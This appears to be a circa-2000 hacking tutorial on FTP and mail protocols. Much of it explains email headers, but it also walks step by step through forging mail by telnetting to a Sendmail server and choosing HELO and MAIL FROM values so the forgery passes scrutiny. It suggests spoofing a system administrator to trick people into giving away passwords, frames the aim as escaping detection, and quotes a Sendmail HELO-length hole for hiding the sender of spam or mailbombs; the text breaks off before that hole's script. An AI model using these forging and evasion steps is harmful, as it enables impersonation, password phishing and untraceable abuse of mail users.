Voila you have just uploaded your own website by using a command line FTP program you have finally learnt to do without the GUI clients. You may say that all this stuff is stupid and you do not give a damn about uploading your site and want to learn how to break into FTP servers and steal passwords....well if you are reading this manual then I am sure you have no knowledge about how to hide your identity while connecting to a FTP server.You see whenever you connect to a FTP server, any server for that matter, your IP is recorded in the Server log and when the system administartor finds that someone is downloading the passwords file, then I am pretty much sure that he would not be too pleased and you will find that the feds are fighting with the SS outside your house as to who gets to arrest you. It is illegal to download password file which is not available to the normal public.Now don't get the wrong idea that I am against hacking or something, but what I want you guys to understand is that I do not want you guys to get caught, and like I said before, if U reading this manual then you do not know how to edit the server logs and how to hide your identity, how to erase all your tracks from the victim's server and how to create a backdoor to the server so that you can access it whenever you want.

Common FTP Hacks

There are various FTP servers with various versions. No FTP server is fully clean of bugs. There are so many bugs that even if I write a line of each it would become too loooooooong. But you can seacrh for FTP bugs by finding out the FTP version number and the OS running at the host and searching for the hole at the following sites:

http://astalavista.box.sk

http://cert.org

http://www.securityforce.com

http://packetstorm.genocide.com

http://www.antionline.com

http://www.rootshell.com

http://www.insecure.org

http://www.ntbugtraq.com

http://support.microsoft.com (Get Security Bulletins and Fixes to common holes

on Windows systems)

http://www.crosswinds.net/~hackingtruths

Some common FTP Bugs would be the FTP bounce Attack and Local FTP bugs(Read the following manual: http://www.crosswinds.net/~hackingtruths/

ftpindex.txt).

There is also a DOS (Denial of Services, not MSDOS) attack which can be used to crash Win NT servers and also a OOB(Out of Band Attack). (Read all about it at: http://blacksun.box.sk/ftp.txt )

SMTP [Port 25] & POP [Port 110]

Most of you would be using email clients like MS Outlook, Netscape Messenger,

Eudora or even Opera to send and receive mail. Have you ever wondered what exactly your favourite email client does? I will just give you an overview of what actually happens.

Now when you compose and mail and click on Send, then your email client locates the mail server that you specified during Configuration time or surfing Setup. Once the mail server is located, your email client by default connects to port 25(SMTP or the Simple Mail Transfer Protocol) to send mail. Now at Port 25 a daemon is running which listens for connections.Now your email client connects to this daemon and sends mail. Most mail servers have Sendmail which is also known as the buggiest daemon on earth installed on the SMTP port. Qmail is also another popular SMTP daemon running on most Web-based email services' mail servers (eg. Hotmail is running qmail).

Now in the other case i.e when you receive mail, your email client by default connects to port 110 i.e the POP3 or the Post Office Protocol (version 3) port.Once connected the POP3 daemon authenticates you i.e. asks for a user name and password which is automatically sent by your email client to the server. Once authenticated, you can receive mail. This means that to send mail you need no user name and password but to receive mail you need a username and password. Recently Yahoo, once it started providing POP based mail, had developed this problem that the user could not send mail unless he had received mail i.e he had authenticated.

Now in the case of free Web Based services too the same thing happens. In this

case you compose your email in a form whose action tag points to a CGI (or Common Gateway InterFace) script which sends the content of the form (that would be what you composed or typed out.) to the Sendmail deamon which is running on Port 25 of the mail server of the company whose mail services you are using. Here you are authenticated once you enter your user name and password at the login page. Sendmail daemons of web based mail servers too can be used to send mail without authentication.

************************

UberHacker Note: Above I have assumed that you have some knowledge of Web

development i.e. HTML or HyperText MarkUp Language and CGI.

To Learn HTML goto:

www.htmlgoodies.com

Search the MSDN Library, which I think simply the most amazing and the most comprehensive library containing all types of Tech Text. URL: http://msdn.microsoft.com

Learn CGI programming with Perl 5 by reading my Perl Tutorials.

*************************

What is my mail server or which is the server I connect to send email. Now if you use the email service provided by your ISP then it is pretty simple to find out the mail server you connect to, to send and receive mail. Now say your ISP's name is xyz and their domain is xyz.com

Then your mail server would most probably be mail.xyz.com (Port 25) to send mail and mail.xyz.com (Port 110) to receive mail.Instead of mail.xyz.com (Port 25) for sendmail mail, you can also try mailgw.xyz.com (Port 25).

Email Headers

The Sendmail daemon is a really interesting one which allows you to get root on a badly configured system and also allows you to send fake mail!!! Well to understand the concept of Fake Mail you need to be more through with Email Headers, So let me start by explaining what email Headers actually are. This brings me back to the subject of what exactly happens when you send a mail, now let me resume from what happens after the Sendmail Daemon has sent your mail. Now say you live in Los Angeles and have sent an email to a friend in New York, so how does your email reach New York? Now once the Sendmail Daemon Has composed your mail then it will send the mail to the Server whose Domain name is the same as the domain name that you entered, (In an email the Domain Name is the text after the @ sign.) So your email may be first sent to the server of the company that provides Internet Backbone is your Country and from there it would be sent to the server is which your friend has an account, so your email travels through a number of Routers and Servers before reaching your friend's Inbox. Now whatever Server an email has travelled through is recorded in the Headers of the Email, the entire path taken by the email and other valuable info is provided by Email Headers.

So How do I see Headers?

Now to look at the complete Headers in Outlook Express , right click on the message and Select Properties, this will bring up a Window Showing only Partial Headers, Now to see the Full Headers click on the Message Source Button. In Netscape you can look at Headers by clicking on View>Headers>Full.To learn about how to see full headers in your fav email client browse the Help of your client.

So you did the above and now know that Headers contain some IP addresses and some Host Names. Now I will explain what exactly Headers Tell you. Now let's take an example header that I specially prepared for you guys.

Return-Path: name@xyz.net

Received: from mail2.xyz.net by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99- 0620AM) id SAA0000012322; Fri, 7 Apr 2000 18:51:27 +0530 (IST)

From: "[Noname]" <name@xyz.net>

To: "Ankit Fadia" <ankit@bol.net.in>

Subject: More questions :)

Date:Mon, 28 Feb 2000 22:13:12 +0100

Message-ID: <20000407131945.16316.qmail@mail2.xyz.net>

MIME-Version: 1.0

Content-Type: text/plain; charset="iso-8859-1"

Content-Transfer-Encoding: 7bit

X-MSMail-Priority:Normal

X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)

 

Now let's go through the entire headers line by line.

Return-Path: name@xyz.net

The above line tells us that the sender is name@xyz.net

This line can easily be forged, but let's stick to a the headers of a genuine email which has not been forged.This line also tells us the name of the ISP or the name of the company with which the sender has an email account with.In this case xyz become the name of the ISP or Email Service provider and www.xyz.net would normaly be the website of the email provider.

Moving further down we find the following line:

Received: from xyz.net by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM)

id SAA0000012322; Fri, 7 Apr 2000 18:51:27 +0530 (IST)

The above line tells us that the email travelled from the server xyz.net to the server delhi1.mtnl.net.in . The text in the brackets after delhi1.mtnl.net.in gives us the Sendmail version number running at delhi1.mtnl.net.in.The above header tells us that delhi1.mtnl.net.in is running version 8.9.1 version of Sendmail at port 25. Now within the brackets there is a date(In this case 26Oct99-0620AM)this date is not the date at which the email passed through this server but the date represents when the Sendmail daemon was last configured or setup or upgraded.The next line in the same header gives us the date at which the email passed through the server.

By reading this header we already know that the mail originated at mail2.xyz.net and was sent by name@xyz.net to ankit@bol.net.in. The mail server of name@xyz.net (i.e. mail2.xyz.net) then passed on the email to my mail server which is delhi1.mtnl.net.in. My mail server then delivered the email to my account.

Before the get on the easier to understand less important lines, I would like to discuss the Message ID line:

Message-ID: 20000407131945.16316.qmail@mail2.xyz.net

Now if you look at this line carefully then you would find that it gives out some very valuable info on the server at which the email was written and also some info on as to when the sender or his email client logged on to his mail server and sent this mail.Now to further understand the above line, let's break it up into smaller pieces.

The part 20000407131945 represents the date/time at which the sender logged on to the mail server to send the mail.It shows the date/time in the yyyymmddhhmmss format.So the above piece of gibberish can be rewritten as:

2000/04/07/13:19:45 which is Year:2000,Month:April(4th month),Day:7th, and Time is 1:19 and 45 seconds(PM)

The number after the first dot i.e. 16316 is the reference number of that particular email.You know that each this email was sent from mail2.xyz.net, but many more maybe thousands more have been sent by that mail server on that particular day, so in order to distiguish mails from each other, each mail is reffered to by a unique Message ID.For each mail that a mail server sends, it logs details regarding info on sender, time etc etc.Now to distiguish between logs of two different emails, the unique Message ID is used.So one gather more info on the sender of a particular email by contacting the system administrator of the mail server that the sender used to send the email with the Message ID.

The next bit tells us that the mail server mail2.xyz.net is running qmail which like Sendmail is a daemon which handles sending of emails.

The remaining few lines are also quite self Explanatory:

From: "[Noname]" <noname@isp.net>

To: "Ankit Fadia" <ankit@bol.net.in>

Subject: More questions :)

Date:Mon, 28 Feb 2000 22:13:12 +0100

MIME-Version: 1.0

Content-Type: text/plain; charset="iso-8859-1"

Content-Transfer-Encoding: 7bit

This tells us that the NickName of the person who has sent this mail is [Noname] and his mail address would be noname@isp.net. The next line specifies the email address to which the mail was sent to. The rest of the lines give us MIME and other info on Encoding etc.

X-MSMail-Priority:Normal

X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)

X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300

The X-Mailer Header tell's us the Email client which sent the mail, in this case it is Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0).

You may say that Headers are very boring and what the hell do they have to do

with Hacking.Well Hacking is about knowledge and knowledge can never be bad for you and the ability to read headers is quite useful when one has to trace Spammers or find out the person who mail bombed him. Most newbies spend a lot of time Scanning for Internet hosts with Port 25 open and never bother to learn how to read headers.They do not know that Headers provide you with a list of mail servers which may allow you to send perfectly forged mail.So take my advice and try to be as through with headers as you can, you are not a hacker if you are not able to read Email headers.

Sending Forged Mail using SMTP (Port 25)

Ever dreamt of sending forged emails so that the victim does not know who sent

this email??? Or do you want to send an email to someone so that he thinks that

the Sender of the email is not you but someone else??? Well then Email Forging

is the thing for you. Sending a forged email is quite simple and easy to understand, but you just need to apply a liitle bit of your brain to understand the various aspects of a perfect forged email and various applications of forging emails. Now first let us see how one can send a forged email.

Remember that earlier in this guide I had explained how an email is sent? If you do not remember then I would suggest you go back a bit and refresh your memory by reading the section titled "SMTP [Port 25] & POP [Port 110]"

Now let's log on to Port 25 of a mail server and see how the Sendmail daemon behaves and how we can send a forged mail.

Open your fav Telnet client, my favourite is the one that ships with Windows anyway then telnet to Port 25 of the mail server.You will be welcomed by something that is called a daemon banner.

220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/26Oct99-0620AM) Fri, 7 Apr 2000 19:57:05 +0530 (IST)

**************

Hacking Truth: A daemon banner is nothing but a welcome message that the host provides to the visitors.But a daemon banner is not merely a unimportant welcome message.It provides us with some very valuable info on the host we have connected to like for example when I connect to Port 23 of my ISP, then I get a Welcome message alongwith the Joke of the day and also the most important of all the OS and OS version runninf at my ISP.This is very imporant when we are looking for an exploit which we can use to break in or get root.

*************

The daemon banner tells us the host we are connected to is running Sendmail version 8.9.1 and uses the ESMTP standards or the Extended Simple Mail Tranfer Protocol to transport messages.The number within the brackets give the date and time the Sendmail daemon was last configured or upgraded.The date outside the brackets is the current date and time at the host. I am sure you must have got the hang of reading Headers and such info by now....that makes you kewler than your friends!!!

And if you get an error message instead of the Daemon banner then it means that the host you are trying to connect to has disabled public access to that mail

server to increase the security of the Network.

Before I go on let's see what your email client does when it has connected to Port 25 and started communicating with the Sendmail daemon. Now the email client sends so Sendmail commands that it knows beforehand and orders Sendmail to prepare a mail for such and such person which is supposed to be from such and such person and the body of the email is to be blah blah blah.

The morale of the story was that the email client uses Sendmail commands to give info such as Sender's email address, recepient's email address, the body of the email address etc etc to the Sendmail daemon, this means that the email client controls what info is to be given to Sendmail and wheather this info is to be true or not.The above process of connecting to Port 25 of the mail server is not viewable to the user and occurs in the background.

*************

Hacking Truth: Outlook Express infact records all the commands that it issued to the mail server to send mails.Ths log fils is stored in the "c:\windows\application data" folder under the name smtp.log Just search for smtp.log and you will get many results.Let's look at a typical Outlook Express Log file.The following is an excerpt:

Outlook Express 5.00.2314.1300

SMTP Log started at 10/08/1999 15:00:33

SMTP: 15:01:15 [rx] 220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1

(1.1.20.3/16Sep99-0827PM) Fri, 8 Oct 1999 14:50:17 +0530 (IST)

SMTP: 15:01:15 [tx] HELO hacker

SMTP: 15:01:15 [rx] 250 delhi1.mtnl.net.in Hello [203.xx.248.175], pleased to

meet you

SMTP: 15:01:16 [tx] MAIL FROM: <ankit@bol.net.in>

SMTP: 15:01:16 [rx] 250 <ankit@bol.net.in>... Sender ok

SMTP: 15:01:16 [tx] RCPT TO: <billgates@hotmail.com>

SMTP: 15:01:16 [rx] 250 <billgates@hotmail.com>... Recipient ok

SMTP: 15:01:16 [tx] DATA

SMTP: 15:01:16 [rx] 354 Enter mail, end with "." on a line by itself

SMTP: 15:01:20 [tx]

.

SMTP: 15:01:23 [rx] 250 OAA0000014842 Message accepted for delivery

SMTP: 15:01:23 [tx] QUIT

SMTP: 15:01:23 [rx] 221 delhi1.mtnl.net.in closing connection

Those of you who are already familiar with SMTP or Sendmail commands can pretty much make out how revealing this log file is and what kind of important info on the email sending activities of the user is reveals.

Such a detailed report or log on each and every mail ever sent through Outlook

Express is recorded in this file. Deleting emails from the Sent folder of Outlook Express does not clean these logs.A well informed hacker would be no time be able to get a list of people to whom you have sent mails to. Well that is Microsoft for you!!! Well atleast the log file does not reveal the actualy body of the email. And if you can't make head or tail or the above, then read on.

*******************

Now that we have connected to Sendmail we are going to repeat the entire above process manually to send forged mail.

You do not need to memorise or remember these SMTP commands in order to send forged mail. Whenever you have the slighest doubt or have forgotten the syntax or the command itself, then you can easily get help by simply typing 'Help' at the sendmail prompt. On some systems typing '?' might bring a response.

NOTE: Whatever you type at the Sendmail prompt is not visible to you unless you enable the local echo option.If you are using the Telnet client shipping with Windows then simple click on Terminal > Preferences and from the dialog box enable the Local Echo option.

So typing Help at the prompt prompts the following result:

214-This is Sendmail version 8.9.1

214-Topics:

214- HELO EHLO MAIL RCPT DATA

214- RSET NOOP QUIT HELP VRFY

214- EXPN VERB ETRN DSN

214-For more info use "HELP <topic>".

214-To report bugs in the implementation send email to

214- sendmail-bugs@sendmail.org.

214-For local information send email to Postmaster at your site.

214 End of HELP info

To get help on individual commands you can try typing help followed by the commandname. For eaxmple typing

help helo

Brings the following response:

214-HELO 214- Introduce yourself.

214 End of HELP info

Eagle Eyed readers must have noticed that all messages from the server have a preceeding number, well you guessed it the numbers represent the kind of message following it. For example, all help messages by default have the number 214. Each kind of message that the server sends has a unique number associated with it.

Before you go on I suggest you find out what each command does by typing help following by the command name and also if possible read the Unix man pages on Sendmail, they are quite good.You will not be able to understand the next part if you do not know the syntax and use of each command. Do read the Sendmail help before reading further. Anyway let's move on.

Now let's see...I want to send myself an email at ankit@bol.net.in from billgates@microsoft.com

So I type the following, note that the text that I type has no preceeding number and the text which have a preceeding number is the response from the server I am connected to.

helo ankit.com

250 delhi1.mtnl.net.in Hello, pleased to meet you

mail from:billgates@microsoft.com

250 <billgates@microsoft.com> ... Sender Okay

rcpt to:ankit@bol.net.in

250 <ankit@bol.net.in> ... Recipient Okay

data

354 Enter mail, end with "." on a line by itself My first forged mail!!!

.

250 Mail accepted

Then I opened my Inbox and read through the Headers of the this email that I just forged.

Return-Path: <billgates@microsoft.com>

Received: from ankit.com by myisp.com(8.9.1/1.1.20.3/26Oct99-0620AM)

id UAA0000026614; Fri, 7 Apr 2000 20:01:52 +0530 (IST)

Date: Fri, 7 Apr 2000 20:01:52 +0530 (IST)

From: <billgates@microsoft.com>

Message-Id: <200004071431.UAA0000026614@delhi1.mtnl.net.in>

X-UIDL: dcbef1ba736c55ddc08d6a93609979a9

 

The email seems to be pretty much a perfect forge, but the line that is the most

obvious culprit which gives me away is:

Received: from ankit.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM)

id UAA0000026614; Fri, 7 Apr 2000 20:01:52 +0530 (IST)

The ankit.com thing would arouse the suspicion of any experienced hacker.Now how can the following scenario be true when the email address that the message is coming from has the domain name:microsoft.com but the email header says that the mail originated not from a mail server within Microsoft' s network but from ankit.com which is supposedly a mail server.

Now why did Sendmail put ankit.com in the header? So I went through the SMTP commands that I had issued once again and found that I had given the helo ankit.com command and Sendmail had picked this domain ankit.com and put it into the header of the email.So to remove this ankit.com from the header and to make the email to look more authentic, I change the parameter that I passed the Helo command with.

Instead of 'helo ankit.com' I try out 'helo microsoft.com' and let the other commands remain the same.Now when I see the headers, I see that the headers have changed to:

Return-Path: <billgates@microsoft.com>

Received: from microsoft.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM)

id UAA0000020667; Fri, 7 Apr 2000 20:00:10 +0530 (IST)

Date: Fri, 7 Apr 2000 20:00:10 +0530 (IST)

From: <billgates@microsoft.com>

Message-Id: <200004071430.UAA0000020667@delhi1.mtnl.net.in>

X-UIDL: 636646d210be0e13fbcf936308c99222

The ankit.com bit does not appear again and this kind of forgery may pass if the

person to whom you are sending this email to is a newbie. But experienced hackers will definitely point out that the Message-Id part of the header says that

the email was composed at delhi1.mtnl.net.in but the second line says that the email originated at microsoft.com. So he would write to postmaster@delhi1.mtnl.net.in or help@delhi1.mtnl.net.in or root@delhi1.mtnl.net.in and complain that he had received a forged email and would like to investigate. Most system administrators are really jumpy about their servers being used for purposes they were not meant for and will easily co operate with the comaplainer and you are caught.Some ISP's are so cranky that if you are caught doing something like this, you will probably be kicked out of the use of their service.

There is not solution to this problem. By that what I mean to say is that the victim can always send an email to the system administrator of the server shown by the Message ID line. But the forgery may look for more real if the Message ID line shows the mail server of the same domain name as the forged email address belongs to. For example, say the forged email address is billgates@microsoft.com then instead of the Message-Id showing the delhi1.mtnl.net.in server, if it shows something like mail.microsoft.com, it makes the email look more authentic.

*******************

Hacking Truth: When we give the MAIL FROM: billgates@microsoft.com, then the mail appears to have come from Bill Gates. Now in the Mail from command, we can instead of providing an email address, provide something like root or

ocalhost. So For Example, if I enter the command: MAIL FROM: root then the heads of the email would look like:

Return-Path: <root>

Received: from microsoft.com by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id TAA0000022089; Sun, 9 Apr

2000 19:55:42 +0530 (IST)

Date:Sun, 9 Apr 2000 19:55:42 +0530 (IST)

From: root@microsoft.com

Message-ID:200004091425.TAA0000022089@mailgw.xx.microsoft.com

X-UIDL: 636646d210be0e13fbcf936308c99222

This way we can make the email seem to have come from the system administrator which then in turn can be utilised in fooling people into giving away their Internet Passwords. Yes...Email forging CAN be used to steal passwords, one just needs a bit of intelligence and a great deal of luck.

*******************

Now that you know how to read some basic headers, let's examine some more advanced headers which we receive from all emails sent to a mailing list. When you see the full headers of an email that you received through a mailing list, you will find that the email headers are more advanced and difficult to understand. Let's take an example of to make things clearer.The following are the headers of a recent email that I received through my mailing list; programmingforhackers.[I myself had sent this email to the list.]

Return-Path: <sentto-1575622-4-ankit=bol.net.in@returns.onelist.com>

Received: from b05.egroups.com by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000021910; Thu, 13

Apr 2000 14:29:14 +0530 (IST)

X-eGroups-Return: sentto-1575622-4-ankit=bol.net.in@returns.onelist.com

Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000

08:58:09 -0000

Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000

Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr

2000 08:58:07 -0000

Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with

SMTP; 13 Apr 2000 08:58:07 -0000 Received: (qmail 2092 invoked from

network); 13 Apr 2000 08:58:01 -0000

Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with

SMTP; 13 Apr 2000 08:58:01 -0000

Received: from bol.net.in by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13

Apr 2000 14:28:46 +0530 (IST)

Message-ID: <38F61F28.B2045192@bol.net.in>

X-Mailer: Mozilla 4.5 [en] (Win98; I)

X-Accept-Language: en

To: "programmingforhackers@eGroups.com" <programmingforhackers@eGroups.com>

References: <38F4E37B.55A83239@bol.net.in>

MIME-Version: 1.0

Mailing-List: list programmingforhackers@egroups.com; contact

programmingforhackers-owner@egroups.com

Delivered-To: mailing list programmingforhackers@egroups.com

Precedence: bulk

List-Unsubscribe:<mailto:programmingforhackers-unsubscribe@egroups.com>

Date: Thu, 13 Apr 2000 15:25:33 -0400

X-eGroups-From: Ankit Fadia <ankit@bol.net.in>

From: Ankit Fadia <ankit@bol.net.in>

Reply-To: programmingforhackers-owner@egroups.com

Subject: [programmingforhackers] Hi

Content-Type: multipart/alternative;

boundary="------------EF668DA53EE7F0ED0AA654E9"

This email header is lot different from the headers that we had examined earlier.It's not as difficult to understand this header, as it seems. Believe me, it is quite easy, once you ge the hang of it. To examine this header, we will be going in the reverse order.i.e. we will take the bottommost line first and then slowly move up.

Date: Thu, 13 Apr 2000 15:25:33 -0400

X-eGroups-From: Ankit Fadia <ankit@bol.net.in>

From: Ankit Fadia <ankit@bol.net.in>

Reply-To: programmingforhackers-owner@egroups.com

Subject: [programmingforhackers] Hi

Content-Type: multipart/alternative;

boundary="------------EF668DA53EE7F0ED0AA654E9"

This part of the header basically tells us that the mail was sent by ankit@bol.net.in on 13th april at 3:15 PM 4 hours behind GMT.It also tells us that replying to this email will send the message to the Group Owner of this mailing list.(Same as the moderator of the list.)

X-Mailer: Mozilla 4.5 [en] (Win98)

X-Accept-Language: en

To: "programmingforhackers@eGroups.com" <programmingforhackers@eGroups.com>

References: <38F4E37B.55A83239@bol.net.in>

MIME-Version: 1.0

Mailing-List: list programmingforhackers@egroups.com; contact

programmingforhackers-owner@egroups.com

Delivered-To: mailing list programmingforhackers@egroups.com

Precedence: bulk

List-Unsubscribe:<mailto:programmingforhackers-unsubscribe@egroups.com>

How many times, have you seen lamers posting messages like: How can I unsubscribe from this list??? Or even Please Unsubscribe me, to Hardcore Hacking Lists .These so called Hackers are nothing but script kiddies who are so lame that it doesn't even stike them that seeing the email headers might help.Wonder if they even know what Headers are.

Most Mailing Lists(Atleast Egroups and Onelist do) attach information to the headers about the mailing list.This information includes the list name, the email address of the moderator and also the email address which is required to unsubscribe from the mailing list.

This part of the email header also tells us that the sender i.e. ankit@bol.net.in used Mozilla 4.5 running on Win98 and the mail was sent to programmingforhackers@egroups.com

Now comes the part which a newbie might have difficult to understand.

Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000

08:58:09 -0000

Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000

Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr

2000 08:58:07 -0000

Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with

SMTP; 13 Apr 2000 08:58:07 -0000 Received: (qmail 2092 invoked from

network); 13 Apr 2000 08:58:01 -0000

Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with

SMTP; 13 Apr 2000 08:58:01 -0000

Received: from bol.net.in by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13

Apr 2000 14:28:46 +0530 (IST)

Message-ID: 38F61F28.B2045192@bol.net.in

NOTE: Like I said earlier, we would be reading the lines in the reverse order.

Received: from bol.net.in by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM); Thu, 13 Apr 2000 14:28:46 +0530 (IST)

Message-ID: 38F61F28.B2045192@delhi1.mtnl.net.in

This line tells us that the mail was sent using the Sendmail Daemon (8.9.1) running at delhi1.mtnl.net.in.The bol.net.in part was generated because the email client which was used by the sender to send the mail gave the following command to delhi1.mtnl.net.in:

helo bol.net.in

Hence it got into the header.Once the email was composed, the Sendmail daemon checks to which domain the email has to be sent.It found that the receipient was programmingforhackers@egroups.com hence it said." Let me pass it on to an egroups server.

Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr

2000 08:58:07 -0000

Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with

SMTP; 13 Apr 2000 08:58:07 -0000 Received: (qmail 2092 invoked from

network); 13 Apr 2000 08:58:01 -0000

Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with

SMTP; 13 Apr 2000 08:58:01 -0000

After the mail was composed, delhi1.mtnl.net.in whose IP is 203.xx.243.51 passed the email on to the egroups server, qg.egroups.com. At egroups the entire world has been divided into many parts and a unique different server handles mails coming from different parts of the world.

Then qg.egroups.com launched the qmail daemon(qmail too is a daemon similar to Sendmail but it is much more secure.) running on another machine within the Egroups Internal Network whose IP is 10.1.2.27(See, the email headers do not display the machine name always, sometimes it simply displays the IP of the machine. And hey this machine would probably be behind a firewall, so no use Telnetting it.) Hence at 10.1.2.27 the email was re-composed and was sent to mta1 yet another machine within the Network running SMTP. But. mta1 cannot be it's full name, and neither has it's IP been displayed, so what is the address of this machine.If you look at the next line,you will see that the IP of mta1 is given to be: 10.1.10.26. If you have read this manual carefully then you would be able to say what kind of Network it is. If you can't, well, it is a Class B network.

mta1 or 10.1.10.26 then sent it to m3.onelist.org which is running QMQP. Now what the hell is that? It basically is a part of qmail which receives messages via the Quick Mail Queueing Protocol (QMQP).It allows users to relay messages to any destination,but is generally used to send messages of preauthorised users.

Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000

08:58:09 -0000

Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000

Then the QMQP was used to start the qmail daemon and the message was in queue and was then sent to bo5.egroups.com by 10.1.10.37 which is actually either m3.onelist.org or the machine at which the qmail daemon is running. b05.egroups.com is the server where the database of the list of members of a particular mailing list is stored.It is here where the server sends the email to all members of the list.This server is runnign NNFMP which basically checks that the members of the list are reachable or not. For example, if a particular email address which is a part of a list does not exist then it is this NNFMP service which generates an error messages and therby after attempting twice or thrice to send the message,removes this invalid email address from the database of subscribers.

Return-Path: <sentto-1575622-4-ankit=bol.net.in@returns.onelist.com>

Received: from b05.egroups.com by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000021910; Thu, 13

Apr 2000 14:29:14 +0530 (IST)

X-eGroups-Return: sentto-1575622-4-ankit=bol.net.in@returns.onelist.com

As and when the server finds subscribers in it's database, it prepares the headers and sends the messages to them.The numbers preceeding the email address of the receiver is the reference number used by the Egroups server to refer to a particular member and the message sent to him.Hence the Return Path Statement does not show the sender of the email but the email address of the person for whom the email was meant.

There is a misconception amongst people that if an email has been sent from a hotmail account, then you remain anonymous.This is not at all true.Yes Homtail may seem to be anonymous to a certain extend, but it is not too difficult to find out more about a Hotmail user.

The flaw lies in the headers that the Hotmail mail servers attach to all outgoing mails. Hotmail records the IP's of all people who log into their accounts. Now this IP is attached to all the respective outgoing mails. Now let's take a look at a typical header of an email sent from a Hotmail account.

Return-Path: <namita_8@hotmail.com>

Received: from hotmail.com by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM)

id TAA0000032714; Sun, 23 Jan 2000 19:02:21 +0530 (IST)

Received: (qmail 34532 invoked by uid 0); 23 Jan 2000 13:30:14 -0000

Message-ID: <20000123133014.34531.qmail@hotmail.com>

Received: from 202.54.109.174 by www.hotmail.com with HTTP; Sun, 23 Jan 2000

05:30:14 PST

X-Originating-IP: [202.xx.109.174]

From: "Namita Mullick" <namita_8@hotmail.com>

To: ankit@bol.net.in

Date: Sun, 23 Jan 2000 19:00:14 IST

Mime-Version: 1.0

Content-Type: text/plain; format=flowed

X-UIDL: 5c296dd2b5265c76e117ae1390e229ab

The line that interests us the following:

X-Originating-IP: [202.xx.109.174]

NOTE: I have delibrately inserted xx instead of actual numbers for privacy purposes.

What's this in the brackets? Well that is the IP address of the sender of the email. This IP would most certainly be a dynamic one, this means that somebody else might be assigned that same IP at this moment. But we can easily find out the ISP which issues this IP to it's subscribers by doing a traceroute.

C:\windows>tracert 202.xx.109.174

This security flaw is not only present in Hotmail, but many other Web Based Email Service providers and also some ISP's have this tendency of not keeping security absoulutely tight and let this flaw prevail. So how do you get around this problem? Well Proxy Servers hold the answer. Now let's understand how proxy servers give us anonymity. Normlly a TCP\IP data tranfer takes place something like in the following way:

Your IP Address is 203.xx.21.11 and you connect to www.hotmail.com.

203.xx.21.11 ----------> www.hotmail.com

You send a request to hotmail.com. Hotmail's server records your IP and uses

this recorded IP to send data packets to you.

www.hotmail.com --------> 203.xx.21.11

So when you send an email using your Hotmail account, the receiver of your email knows your identity and can trace you. But after you install a Proxy server, the data transfer will take place in the following way:

203.xx.21.11 --------> 121.xx.01.89 ----------> www.hotmail.com

Now in this case, you send a request to hotmail.com which is sent via the proxy server, whose IP address is 121.xx.01.89.Hence hotmail establishes a direct connection with the Proxy Server(121.xx.01.89) and an indirect connection with you(203.xx.21.11). Hence the IP address that Hotmail records is the unique IP of the Proxy server installed at your system and not your direct IP. Hence you remain private.

Popular Proxy Servers for Windows are WinGate and WinProxy. There are also online Privacy services like anonymous.com and privacyx.com.

Only privacyx.com is a good one.

*********ROOTSHELL***************

Here's a brief description of Sendmail (qmail) hole I found recently:

When someone mailbombs you, or tries to send fakemail, spam, etc - sendmail normally attachs sender's host name and it's address to outgoing message:

--

>From spam@flooders.net Mon Jan 5 22:08:21 1998

Received: from spammer (marc@math.university.edu [150.129.84.5])

by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376

for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100

Date: Mon, 5 Jan 1998 22:07:54 +0100

From: spam@flooders.net

Message-Id: <3.14159665@pi>

MAILBOOM!!!

--

That's perfect - now you know, who is responsible for that annoying junk in your mailbox: "Received: from spammer (marc@math.university.edu [150.129.84.5])". Nothing easier... But I found a small hole, which allows user to hide it's personality, and send mails anonymously. The only thing you should do is to pass HELO string longer than approx. 1024 B - sender's location and other very useful information will be cropped!!! Message headers should become not interesting. Sometimes, sender may become quite untraceable (but not always, if it's possible to obtain logs from machine which has been used to sent):

--

>From spam@flooders.net Mon Jan 5 22:09:05 1998

Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx

Date: Mon, 5 Jan 1998 22:08:52 +0100

From: spam@flooders.net

Message-Id: <3.14159665@pi>

MAILBOOM!!! Now guess who am I...

--

 

Here's a simple example of Sendmail's HELO hole usage. Note, this script has been written ONLY to show how easy may be sending fakemails, mailbombs, with cooperation of Sendmail ;) Script is very slow and restricted in many ways, but explains the problem well (note, some of non-Berkeley daemons are also affected,probably Qmail?):

